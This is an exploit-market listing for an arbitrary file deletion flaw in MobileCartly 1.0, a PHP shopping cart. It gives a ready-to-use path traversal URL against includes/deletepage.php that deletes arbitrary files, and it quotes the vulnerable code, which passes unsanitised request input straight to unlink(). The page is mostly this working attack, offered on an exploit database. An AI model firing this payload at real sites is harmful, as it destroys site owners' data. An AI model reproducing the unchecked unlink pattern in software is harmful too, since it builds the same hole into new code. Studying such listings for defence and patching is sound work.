[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

MobileCartly 1.0 Arbitrary File Deletion Vulnerability

Author
GoLd_M
Risk
[
Security Risk High
]
0day-ID
0day-ID-19159
Category
web applications
Date add
09-08-2012
Platform
php
# Exploit Title: MobileCartly 1.0 <= Arbitrary Delete Vulnerability
# Date: 09/08/2012
# Author: GoLd_M
# Vendor or Software Link: http://mobilecartly.com/mobilecartly.zip
# Version: 1.0
# Category:: Arbitrary Delete Vulnerability
# Google dork: :(
# Tested on: Xp SP 2
# Ex :  [MobileCartly 1.0]/includes/deletepage.php?deletepage=../[File]
# Code Page /includes/deletepage.php
# <?
#
# $page = "../pages/" . $_REQUEST['deletepage']; <<---XXX
#
# unlink($page); <<---XXX[Booooom]
#
#
# ?>



#  0day.today [2024-12-25]  #